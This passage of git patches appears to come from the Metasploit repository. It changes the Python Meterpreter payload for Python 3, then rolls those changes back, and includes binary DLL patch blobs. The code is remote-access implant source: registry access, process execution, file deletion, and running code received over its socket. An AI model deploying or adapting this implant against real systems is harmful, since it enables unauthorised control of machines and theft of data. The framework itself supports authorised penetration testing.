4096)() value_data_sz = ctypes.c_uint32() value_data_sz.value = ctypes.sizeof(value_data) - result = ctypes.windll.advapi32.RegQueryValueExA(hkey, value_name, 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz)) + result = ctypes.windll.advapi32.RegQueryValueExA(hkey, ctypes.byref(value_name), 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz)) if result == ERROR_SUCCESS: response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value) - if value_type.value == REG_SZ: - response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00') - elif value_type.value == REG_DWORD: + if value_type.value == winreg.REG_SZ: + response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + NULL_BYTE) + elif value_type.value == winreg.REG_DWORD: value = value_data[:4] value.reverse() - value = ''.join(map(chr, value)) + if sys.version_info[0] < 3: + value = ''.join(map(chr, value)) + else: + value = bytes(value) response += tlv_pack(TLV_TYPE_VALUE_DATA, value) else: response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value)) @@ -1395,9 +1435,10 @@ def stdapi_registry_query_value(request, response): def stdapi_registry_set_value(request, response): hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value'] value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value'] + value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8')) value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value'] value_data = packet_get_tlv(request, TLV_TYPE_VALUE_DATA)['value'] - result = ctypes.windll.advapi32.RegSetValueExA(hkey, value_name, 0, value_type, value_data, len(value_data)) + result = ctypes.windll.advapi32.RegSetValueExA(hkey, ctypes.byref(value_name), 0, value_type, value_data, len(value_data)) return result, response @meterpreter.register_function_windll diff --git a/data/meterpreter/ext_server_stdapi.x64.dll b/data/meterpreter/ext_server_stdapi.x64.dll index d298f5525ec761cbb55e6ba4694cceee8368b931..c4a2aec8f3ac0dc511ba7d04899e4f9348ac46d0 100755 GIT binary patch delta 54 zcmZpeAlWcMa)SgTv&#JmlcgE`7@3;07~8WLL6`}MnYU*#vT)r2Nw=5ZW!YYSm$fqs E0Ly9;00000 delta 54 zcmZpeAlWcMa)SgT^O}DhlcgE`7#*9l7~8WLL6`}MnYU*#vT)r2Nw=5ZW!YYSm$fqs E0QZj*eE<Le diff --git a/data/meterpreter/ext_server_stdapi.x86.dll b/data/meterpreter/ext_server_stdapi.x86.dll index 747a9697261347bb3dd1183692e6dae516cab456..25fba086ee3e525dbd652accdcdcd55454b5bb0e 100755 GIT binary patch delta 66 zcmZo@5pQS_-=M(Ayyo77$;ynr9C}%73``6RjMEqVW|3%~z}P;45rmn5n0fmIMi!Ay Rkka<$T`b#|cd<sA0|2%z6~O=i delta 66 zcmZo@5pQS_-=M(A9QUtdvNEGDN7G6+1||ju#_0=wvq&^gU~Hej2*ON2%)EU9Ba28U QNNM}>E|%@fyI3R50m9K0=l}o! diff --git a/data/meterpreter/meterpreter.jar b/data/meterpreter/meterpreter.jar index 06d20d28ab38d721c974cdae288163d6997fab73..6754a37228bb55a53ba3ba32d1d8bea8822755a9 100644 GIT binary patch delta 36 pcmaF8kMZ?B#tEh@F(=bQCR#ePe&Ko4duC%JZx~o)^Q5qw8~`%z5I_I` delta 36 pcmaF8kMZ?B#tEh@UbEf_O|*1o{mS#GmuF)mZx~o)^Q5qw8~`XE4~YN( diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py index 979ebb4107..7ed0222f35 100644 --- a/data/meterpreter/meterpreter.py +++ b/data/meterpreter/meterpreter.py @@ -1,12 +1,5 @@ #!/usr/bin/python import code -try: - import ctypes -except: - has_windll = False -else: - has_windll = hasattr(ctypes, 'windll') - import os import random import select @@ -15,10 +8,30 @@ import struct import subprocess import sys import threading +import time +import traceback + +try: + import ctypes +except ImportError: + has_windll = False +else: + has_windll = hasattr(ctypes, 'windll') + +if sys.version_info[0] < 3: + is_bytes = lambda obj: issubclass(obj.__class__, str) + bytes = lambda *args: str(*args[:1]) + NULL_BYTE = '\x00' +else: + is_bytes = lambda obj: issubclass(obj.__class__, bytes) + str = lambda x: __builtins__['str'](x, 'UTF-8') + NULL_BYTE = bytes('\x00', 'UTF-8') # # Constants # +DEBUGGING = False + PACKET_TYPE_REQUEST = 0 PACKET_TYPE_RESPONSE = 1 PACKET_TYPE_PLAIN_REQUEST = 10 @@ -100,6 +113,7 @@ TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502 TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503 EXPORTED_SYMBOLS = {} +EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING def export(symbol): EXPORTED_SYMBOLS[symbol.__name__] = symbol @@ -107,7 +121,7 @@ def export(symbol): def generate_request_id(): chars = 'abcdefghijklmnopqrstuvwxyz' - return ''.join(random.choice(chars) for x in xrange(32)) + return ''.join(random.choice(chars) for x in range(32)) @export def inet_pton(family, address): @@ -125,25 +139,6 @@ def inet_pton(family, address): return ''.join(map(chr, lpAddress[8:24])) raise Exception('no suitable inet_pton functionality is available') -@export -def packet_get_tlv(pkt, tlv_type): - offset = 0 - while (offset < len(pkt)): - tlv = struct.unpack('>II', pkt[offset:offset+8]) - if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type: - val = pkt[offset+8:(offset+8+(tlv[0] - 8))] - if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: - val = val.split('\x00', 1)[0] - elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: - val = struct.unpack('>I', val)[0] - elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: - val = bool(struct.unpack('b', val)[0]) - elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: - pass - return {'type':tlv[1], 'length':tlv[0], 'value':val} - offset += tlv[0] - return {} - @export def packet_enum_tlvs(pkt, tlv_type = None): offset = 0 @@ -152,7 +147,7 @@ def packet_enum_tlvs(pkt, tlv_type = None): if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type): val = pkt[offset+8:(offset+8+(tlv[0] - 8))] if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: - val = val.split('\x00', 1)[0] + val = str(val.split(NULL_BYTE, 1)[0]) elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: val = struct.unpack('>I', val)[0] elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: @@ -163,6 +158,14 @@ def packet_enum_tlvs(pkt, tlv_type = None): offset += tlv[0] raise StopIteration() +@export +def packet_get_tlv(pkt, tlv_type): + try: + tlv = list(packet_enum_tlvs(pkt, tlv_type))[0] + except IndexError: + return {} + return tlv + @export def tlv_pack(*args): if len(args) == 2: @@ -170,20 +173,33 @@ def tlv_pack(*args): else: tlv = args[0] data = "" - if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: - data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00' - elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: + if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: data = struct.pack('>III', 12, tlv['type'], tlv['value']) elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: - data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value']))) - elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: - data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value'] - elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP: - data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value'] - elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX: - data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value'] + data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(tlv['value']))), 'UTF-8') + else: + value = tlv['value'] + if not is_bytes(value): + value = bytes(value, 'UTF-8') + if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: + data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE + elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: + data = struct.pack('>II', 8 + len(value), tlv['type']) + value + elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP: + data = struct.pack('>II', 8 + len(value), tlv['type']) + value + elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX: + data = struct.pack('>II', 8 + len(value), tlv['type']) + value return data +#@export +class MeterpreterFile(object): + def __init__(self, file_obj): + self.file_obj = file_obj + + def __getattr__(self, name): + return getattr(self.file_obj, name) +export(MeterpreterFile) + #@export class MeterpreterSocket(object): def __init__(self, sock): @@ -208,11 +224,11 @@ class STDProcessBuffer(threading.Thread): threading.Thread.__init__(self) self.std = std self.is_alive = is_alive - self.data = '' + self.data = bytes() self.data_lock = threading.RLock() def run(self): - for byte in iter(lambda: self.std.read(1), ''): + for byte in iter(lambda: self.std.read(1), bytes()): self.data_lock.acquire() self.data += byte self.data_lock.release() @@ -220,15 +236,20 @@ class STDProcessBuffer(threading.Thread): def is_read_ready(self): return len(self.data) != 0 - def read(self, l = None): - data = '' + def peek(self, l = None): + data = bytes() self.data_lock.acquire() if l == None: data = self.data - self.data = '' else: data = self.data[0:l] - self.data = self.data[l:] + self.data_lock.release() + return data + + def read(self, l = None): + self.data_lock.acquire() + data = self.peek(l) + self.data = self.data[len(data):] self.data_lock.release() return data @@ -236,12 +257,25 @@ class STDProcessBuffer(threading.Thread): class STDProcess(subprocess.Popen): def __init__(self, *args, **kwargs): subprocess.Popen.__init__(self, *args, **kwargs) + self.echo_protection = False def start(self): self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None) self.stdout_reader.start() self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None) self.stderr_reader.start() + + def write(self, channel_data): + self.stdin.write(channel_data) + self.stdin.flush() + if self.echo_protection: + end_time = time.time() + 0.5 + out_data = bytes() + while (time.time() < end_time) and (out_data != channel_data): + if self.stdout_reader.is_read_ready(): + out_data = self.stdout_reader.peek(len(channel_data)) + if out_data == channel_data: + self.stdout_reader.read(len(channel_data)) export(STDProcess) class PythonMeterpreter(object): @@ -251,7 +285,7 @@ class PythonMeterpreter(object): self.channels = {} self.interact_channels = [] self.processes = {} - for func in filter(lambda x: x.startswith('_core'), dir(self)): + for func in list(filter(lambda x: x.startswith('_core'), dir(self))): self.extension_functions[func[1:]] = getattr(self, func) self.running = True @@ -265,6 +299,7 @@ class PythonMeterpreter(object): return func def add_channel(self, channel): + assert(isinstance(channel, (subprocess.Popen, MeterpreterFile, MeterpreterSocket))) idx = 0 while idx in self.channels: idx += 1 @@ -286,7 +321,7 @@ class PythonMeterpreter(object): break req_length, req_type = struct.unpack('>II', request) req_length -= 8 - request = '' + request = bytes() while len(request) < req_length: request += self.socket.recv(4096) response = self.create_response(request) @@ -294,17 +329,17 @@ class PythonMeterpreter(object): else: channels_for_removal = [] # iterate over the keys because self.channels could be modified if one is closed - channel_ids = self.channels.keys() + channel_ids = list(self.channels.keys()) for channel_id in channel_ids: channel = self.channels[channel_id] - data = '' + data = bytes() if isinstance(channel, STDProcess): if not channel_id in self.interact_channels: continue - if channel.stdout_reader.is_read_ready(): - data = channel.stdout_reader.read() - elif channel.stderr_reader.is_read_ready(): + if channel.stderr_reader.is_read_ready(): data = channel.stderr_reader.read() + elif channel.stdout_reader.is_read_ready(): + data = channel.stdout_reader.read() elif channel.poll() != None: self.handle_dead_resource_channel(channel_id) elif isinstance(channel, MeterpreterSocketClient): @@ -312,7 +347,7 @@ class PythonMeterpreter(object): try: d = channel.recv(1) except socket.error: - d = '' + d = bytes() if len(d) == 0: self.handle_dead_resource_channel(channel_id) break @@ -357,13 +392,13 @@ class PythonMeterpreter(object): data_tlv = packet_get_tlv(request, TLV_TYPE_DATA) if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED: return ERROR_FAILURE - preloadlib_methods = self.extension_functions.keys() + preloadlib_methods = list(self.extension_functions.keys()) symbols_for_extensions = {'meterpreter':self} symbols_for_extensions.update(EXPORTED_SYMBOLS) i = code.InteractiveInterpreter(symbols_for_extensions) i.runcode(compile(data_tlv['value'], '', 'exec')) - postloadlib_methods = self.extension_functions.keys() - new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods) + postloadlib_methods = list(self.extension_functions.keys()) + new_methods = list(filter(lambda x: x not in preloadlib_methods, postloadlib_methods)) for method in new_methods: response += tlv_pack(TLV_TYPE_METHOD, method) return ERROR_SUCCESS, response @@ -386,10 +421,10 @@ class PythonMeterpreter(object): if channel_id not in self.channels: return ERROR_FAILURE, response channel = self.channels[channel_id] - if isinstance(channel, file): - channel.close() - elif isinstance(channel, subprocess.Popen): + if isinstance(channel, subprocess.Popen): channel.kill() + elif isinstance(channel, MeterpreterFile): + channel.close() elif isinstance(channel, MeterpreterSocket): channel.close() else: @@ -405,7 +440,7 @@ class PythonMeterpreter(object): return ERROR_FAILURE, response channel = self.channels[channel_id] result = False - if isinstance(channel, file): + if isinstance(channel, MeterpreterFile): result = channel.tell() >= os.fstat(channel.fileno()).st_size response += tlv_pack(TLV_TYPE_BOOL, result) return ERROR_SUCCESS, response @@ -432,13 +467,13 @@ class PythonMeterpreter(object): return ERROR_FAILURE, response channel = self.channels[channel_id] data = '' - if isinstance(channel, file): - data = channel.read(length) - elif isinstance(channel, STDProcess): + if isinstance(channel, STDProcess): if channel.poll() != None: self.handle_dead_resource_channel(channel_id) if channel.stdout_reader.is_read_ready(): data = channel.stdout_reader.read(length) + elif isinstance(channel, MeterpreterFile): + data = channel.read(length) elif isinstance(channel, MeterpreterSocket): data = channel.recv(length) else: @@ -454,13 +489,13 @@ class PythonMeterpreter(object): return ERROR_FAILURE, response channel = self.channels[channel_id] l = len(channel_data) - if isinstance(channel, file): - channel.write(channel_data) - elif isinstance(channel, subprocess.Popen): + if isinstance(channel, subprocess.Popen): if channel.poll() != None: self.handle_dead_resource_channel(channel_id) return ERROR_FAILURE, response - channel.stdin.write(channel_data) + channel.write(channel_data) + elif isinstance(channel, MeterpreterFile): + channel.write(channel_data) elif isinstance(channel, MeterpreterSocket): try: l = channel.send(channel_data) @@ -485,13 +520,17 @@ class PythonMeterpreter(object): if handler_name in self.extension_functions: handler = self.extension_functions[handler_name] try: - #print("[*] running method {0}".format(handler_name)) + if DEBUGGING: + print('[*] running method ' + handler_name) result, resp = handler(request, resp) - except Exception, err: - #print("[-] method {0} resulted in an error".format(handler_name)) + except Exception: + if DEBUGGING: + print('[-] method ' + handler_name + ' resulted in an error') + traceback.print_exc(file=sys.stderr) result = ERROR_FAILURE else: - #print("[-] method {0} was requested but does not exist".format(handler_name)) + if DEBUGGING: + print('[-] method ' + handler_name + ' was requested but does not exist') result = ERROR_FAILURE resp += tlv_pack(TLV_TYPE_RESULT, result) resp = struct.pack('>I', len(resp) + 4) + resp @@ -499,6 +538,9 @@ class PythonMeterpreter(object): if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0): if hasattr(os, 'setsid'): - os.setsid() + try: + os.setsid() + except OSError: + pass met = PythonMeterpreter(s) met.run() diff --git a/data/meterpreter/metsrv.x64.dll b/data/meterpreter/metsrv.x64.dll index d1db92c52b46a4213738d4e63b0b47a9b6837bf2..4856014f718e03894cd454df30fb638b039c82f3 100755 GIT binary patch delta 89 zcmZqJVBN66dcp^0{`(Uqe)eTD6KQs0Y<FS=VJ0AE24WT<W(8t4AZ7<*4j|?PVlE)& a-tNT6BcuS*-X5;V1H`=B!xi~fZUX?iMHv?W delta 89 zcmZqJVBN66dcp_hh5tGxe)eVZ3~qK}Y<FS=VJ0AE24WT<W(8t4AZ7<*4j|?PVlE)& c-tNT6Bc#B*;9p03xFQb_^KK7U<XgE701;6dx&QzG diff --git a/data/meterpreter/metsrv.x86.dll b/data/meterpreter/metsrv.x86.dll index 65ff54d2cee9954a85519ed8fa45b7106ac3b53d..63d44bf6cd755a852a3aa8da6dd90ccf8d15e3e6 100755 GIT binary patch delta 79 zcmZo@&~Iqa-@w7hJni0u$=r;-Om8ilqZr$x7(ti`h?#+y1&CRJm<@>8ftUk`Ik!hK Ua%C}r^tB&n=GuOoncH#?0JQrTn*aa+ delta 79 zcmZo@&~Iqa-@w7h9Q3baGB=|yQ)p##6k~f7BM37AF*6Xe05K~NvjH(X5OV-A=k_Q@ Ut}G^yzV_qHT-%Q`b6f5K0FjFp>i_@% diff --git a/data/meterpreter/screenshot.x64.dll b/data/meterpreter/screenshot.x64.dll index 0958c1e931418c2d6c1397834cd78e3424366043..861df56a583f84d9adc81281ca0719feb697a389 100755 GIT binary patch delta 42 wcmZqJz|*jSX8|L#*8K^SnHhbVvR5<*F}4RWGHwrIWLk6)B)<LoB_>W+06u{aO8@`> delta 42 wcmZqJz|*jSX8|MghJPKCnHhbV(w{d6F}4RWGHwrIWLk6)B)<LoB_>W+09~mNzyJUM diff --git a/data/meterpreter/screenshot.x86.dll b/data/meterpreter/screenshot.x86.dll index 93bf2e177823e083281c34b21c67c1ae336b29a4..597c07099ebf265979988d30934f066176b535f4 100755 GIT binary patch delta 43 xcmZqJz|*jSX8|Mg#(NVcGc)=!yBuY14rXi*W@OwR%*ZtHIY?sr^A}8#`T$#I5Lo~K delta 43 xcmZqJz|*jSX8|K~(!Y+$%#6Ow(^y!VgBja{85y?+Gcrwl4wBgZ`~{PwJ^)9Y4}Aat From 97a70e49c8159c7c3d095e02e31ceb6b3bcc608b Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Thu, 5 Jun 2014 17:31:02 -0500 Subject: [PATCH 498/853] Roll back the jar/py changes --- data/meterpreter/ext_server_stdapi.jar | Bin 38782 -> 38782 bytes data/meterpreter/ext_server_stdapi.py | 121 ++++++---------- data/meterpreter/meterpreter.jar | Bin 24427 -> 24427 bytes data/meterpreter/meterpreter.py | 184 ++++++++++--------------- 4 files changed, 111 insertions(+), 194 deletions(-) diff --git a/data/meterpreter/ext_server_stdapi.jar b/data/meterpreter/ext_server_stdapi.jar index b6a01cac095c0f8e799987555ea70dea3ae1b18e..bef5cee0140fd78c4db9c9ac32eb29b3d7778bc5 100644 GIT binary patch delta 174 zcmV;f08#(`t^)q90+2NXG)|x%kvT7afY4nlZp4Bsw=y&%4Yo;0rXO!_YZ2W%=6&YP zROsx366+hqWWCGP1~Mti-nK@c&2!-g$nM+CDzYwLxf;h2I$}(r^_HRbofOAN$Yef# z5wLDZRXC7SJIG)!#c5)4%L#q)Xej1tUi)vEM~WdX2#E~_3u{t}BG!!^DE__+ytXv; cNqr3|q<909K>-@G3<2<g1T;>d9<qae6sf{Z*8l(j delta 174 zcmV;f08#(`t^)q90+2NX8;47DkvT7apwL|vH)6q+TN#>>2HPY|(vP>dwTNyW^FH%t zN_6%?G3gs|wBF@v1(_6w&NfD$&2#2E$nNX?A|`!!<!TrPXenU~jkgIZ-%4?0!bIld z7Xho9REa$~wSf$_Qk=#_Za$$e9u0A>rnUc;X(SFjBgAAdSXh!$6kOG|C;oj4d2MLy cqWT(ANbv@fK>-@G3<2<g1RIA-bh3kf6pHCi8~^|S diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py index ed7e58701a..ae9cab6cb8 100644 --- a/data/meterpreter/ext_server_stdapi.py +++ b/data/meterpreter/ext_server_stdapi.py @@ -48,24 +48,6 @@ try: except ImportError: has_winreg = False -try: - import winreg - has_winreg = True -except ImportError: - has_winreg = (has_winreg or False) - -if sys.version_info[0] < 3: - is_str = lambda obj: issubclass(obj.__class__, str) - is_bytes = lambda obj: issubclass(obj.__class__, str) - bytes = lambda *args: str(*args[:1]) - NULL_BYTE = '\x00' -else: - is_str = lambda obj: issubclass(obj.__class__, __builtins__['str']) - is_bytes = lambda obj: issubclass(obj.__class__, bytes) - str = lambda x: __builtins__['str'](x, 'UTF-8') - NULL_BYTE = bytes('\x00', 'UTF-8') - long = int - if has_ctypes: # # Windows Structures @@ -516,12 +498,11 @@ def get_stat_buffer(path): blocks = si.st_blocks st_buf = struct.pack('<IHHH', si.st_dev, min(0xffff, si.st_ino), si.st_mode, si.st_nlink) st_buf += struct.pack('<HHHI', si.st_uid, si.st_gid, 0, rdev) - st_buf += struct.pack('<IIII', si.st_size, long(si.st_atime), long(si.st_mtime), long(si.st_ctime)) + st_buf += struct.pack('<IIII', si.st_size, si.st_atime, si.st_mtime, si.st_ctime) st_buf += struct.pack('<II', blksize, blocks) return st_buf def netlink_request(req_type): - import select # See RFC 3549 NLM_F_REQUEST = 0x0001 NLM_F_ROOT = 0x0100 @@ -532,25 +513,17 @@ def netlink_request(req_type): sock.bind((os.getpid(), 0)) seq = int(time.time()) nlmsg = struct.pack('IHHIIB15x', 32, req_type, (NLM_F_REQUEST | NLM_F_ROOT), seq, 0, socket.AF_UNSPEC) - sock.send(nlmsg) + sfd = os.fdopen(sock.fileno(), 'w+b') + sfd.write(nlmsg) responses = [] - if not len(select.select([sock.fileno()], [], [], 0.5)[0]): - return responses - raw_response_data = sock.recv(0xfffff) - response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)]) - raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):] + response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR))) while response.type != NLMSG_DONE: if response.type == NLMSG_ERROR: break - response_data = raw_response_data[:(response.len - 16)] + response_data = sfd.read(response.len - 16) responses.append(response_data) - raw_response_data = raw_response_data[len(response_data):] - if not len(raw_response_data): - if not len(select.select([sock.fileno()], [], [], 0.5)[0]): - break - raw_response_data = sock.recv(0xfffff) - response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)]) - raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):] + response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR))) + sfd.close() sock.close() return responses @@ -586,7 +559,7 @@ def channel_open_stdapi_fs_file(request, response): else: fmode = 'rb' file_h = open(fpath, fmode) - channel_id = meterpreter.add_channel(MeterpreterFile(file_h)) + channel_id = meterpreter.add_channel(file_h) response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id) return ERROR_SUCCESS, response @@ -702,7 +675,6 @@ def stdapi_sys_process_execute(request, response): proc_h.stderr = open(os.devnull, 'rb') else: proc_h = STDProcess(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) - proc_h.echo_protection = True proc_h.start() else: proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) @@ -721,15 +693,15 @@ def stdapi_sys_process_getpid(request, response): def stdapi_sys_process_get_processes_via_proc(request, response): for pid in os.listdir('/proc'): - pgroup = bytes() + pgroup = '' if not os.path.isdir(os.path.join('/proc', pid)) or not pid.isdigit(): continue - cmdline_file = open(os.path.join('/proc', pid, 'cmdline'), 'rb') - cmd = str(cmdline_file.read(512).replace(NULL_BYTE, bytes(' ', 'UTF-8'))) - status_data = str(open(os.path.join('/proc', pid, 'status'), 'rb').read()) + cmd = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read(512).replace('\x00', ' ') + status_data = open(os.path.join('/proc', pid, 'status'), 'rb').read() status_data = map(lambda x: x.split('\t',1), status_data.split('\n')) + status_data = filter(lambda x: len(x) == 2, status_data) status = {} - for k, v in filter(lambda x: len(x) == 2, status_data): + for k, v in status_data: status[k[:-1]] = v.strip() ppid = status.get('PPid') uid = status.get('Uid').split('\t', 1)[0] @@ -753,14 +725,14 @@ def stdapi_sys_process_get_processes_via_proc(request, response): def stdapi_sys_process_get_processes_via_ps(request, response): ps_args = ['ps', 'ax', '-w', '-o', 'pid,ppid,user,command'] proc_h = subprocess.Popen(ps_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) - ps_output = str(proc_h.stdout.read()) + ps_output = proc_h.stdout.read() ps_output = ps_output.split('\n') ps_output.pop(0) for process in ps_output: process = process.split() if len(process) < 4: break - pgroup = bytes() + pgroup = '' pgroup += tlv_pack(TLV_TYPE_PID, int(process[0])) pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(process[1])) pgroup += tlv_pack(TLV_TYPE_USER_NAME, process[2]) @@ -821,7 +793,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response): use = ctypes.c_ulong() use.value = 0 ctypes.windll.advapi32.LookupAccountSidA(None, user_tkn.Sid, username, ctypes.byref(u_len), domain, ctypes.byref(d_len), ctypes.byref(use)) - complete_username = str(ctypes.string_at(domain)) + '\\' + str(ctypes.string_at(username)) + complete_username = ctypes.string_at(domain) + '\\' + ctypes.string_at(username) k32.CloseHandle(tkn_h) parch = windll_GetNativeSystemInfo() is_wow64 = ctypes.c_ubyte() @@ -830,7 +802,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response): if k32.IsWow64Process(proc_h, ctypes.byref(is_wow64)): if is_wow64.value: parch = PROCESS_ARCH_X86 - pgroup = bytes() + pgroup = '' pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID) pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID) pgroup += tlv_pack(TLV_TYPE_USER_NAME, complete_username) @@ -878,18 +850,16 @@ def stdapi_fs_delete_dir(request, response): @meterpreter.register_function def stdapi_fs_delete_file(request, response): file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] - if os.path.exists(file_path): - os.unlink(file_path) + os.unlink(file_path) return ERROR_SUCCESS, response @meterpreter.register_function def stdapi_fs_file_expand_path(request, response): path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] if has_windll: - path_tlv = ctypes.create_string_buffer(bytes(path_tlv, 'UTF-8')) path_out = (ctypes.c_char * 4096)() - path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(ctypes.byref(path_tlv), ctypes.byref(path_out), ctypes.sizeof(path_out)) - result = str(ctypes.string_at(path_out)) + path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out)) + result = ''.join(path_out)[:path_out_len] elif path_tlv == '%COMSPEC%': result = '/bin/sh' elif path_tlv in ['%TEMP%', '%TMP%']: @@ -942,8 +912,7 @@ def stdapi_fs_md5(request, response): @meterpreter.register_function def stdapi_fs_mkdir(request, response): dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value'] - if not os.path.isdir(dir_path): - os.mkdir(dir_path) + os.mkdir(dir_path) return ERROR_SUCCESS, response @meterpreter.register_function @@ -996,7 +965,7 @@ def stdapi_fs_stat(request, response): @meterpreter.register_function def stdapi_net_config_get_interfaces(request, response): - if hasattr(socket, 'AF_NETLINK') and hasattr(socket, 'NETLINK_ROUTE'): + if hasattr(socket, 'AF_NETLINK'): interfaces = stdapi_net_config_get_interfaces_via_netlink() elif has_osxsc: interfaces = stdapi_net_config_get_interfaces_via_osxsc() @@ -1005,7 +974,7 @@ def stdapi_net_config_get_interfaces(request, response): else: return ERROR_FAILURE, response for iface_info in interfaces: - iface_tlv = bytes() + iface_tlv = '' iface_tlv += tlv_pack(TLV_TYPE_MAC_NAME, iface_info.get('name', 'Unknown')) iface_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, iface_info.get('hw_addr', '\x00\x00\x00\x00\x00\x00')) if 'mtu' in iface_info: @@ -1033,7 +1002,7 @@ def stdapi_net_config_get_interfaces_via_netlink(): 0x0100: 'PROMISC', 0x1000: 'MULTICAST' } - iface_flags_sorted = list(iface_flags.keys()) + iface_flags_sorted = iface_flags.keys() # Dictionaries don't maintain order iface_flags_sorted.sort() interfaces = {} @@ -1137,7 +1106,7 @@ def stdapi_net_config_get_interfaces_via_osxsc(): hw_addr = hw_addr.replace(':', '') hw_addr = hw_addr.decode('hex') iface_info['hw_addr'] = hw_addr - ifnames = list(interfaces.keys()) + ifnames = interfaces.keys() ifnames.sort() for iface_name, iface_info in interfaces.items(): iface_info['index'] = ifnames.index(iface_name) @@ -1169,10 +1138,7 @@ def stdapi_net_config_get_interfaces_via_windll(): iface_info['index'] = AdapterAddresses.u.s.IfIndex if AdapterAddresses.PhysicalAddressLength: iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(AdapterAddresses.PhysicalAddress), AdapterAddresses.PhysicalAddressLength) - iface_desc = ctypes.wstring_at(AdapterAddresses.Description) - if not is_str(iface_desc): - iface_desc = str(iface_desc) - iface_info['name'] = iface_desc + iface_info['name'] = str(ctypes.wstring_at(AdapterAddresses.Description)) iface_info['mtu'] = AdapterAddresses.Mtu pUniAddr = AdapterAddresses.FirstUnicastAddress while pUniAddr: @@ -1208,7 +1174,7 @@ def stdapi_net_config_get_interfaces_via_windll_mib(): table_data = ctypes.string_at(table, pdwSize.value) entries = struct.unpack('I', table_data[:4])[0] table_data = table_data[4:] - for i in range(entries): + for i in xrange(entries): addrrow = cstruct_unpack(MIB_IPADDRROW, table_data) ifrow = MIB_IFROW() ifrow.dwIndex = addrrow.dwIndex @@ -1278,10 +1244,9 @@ def 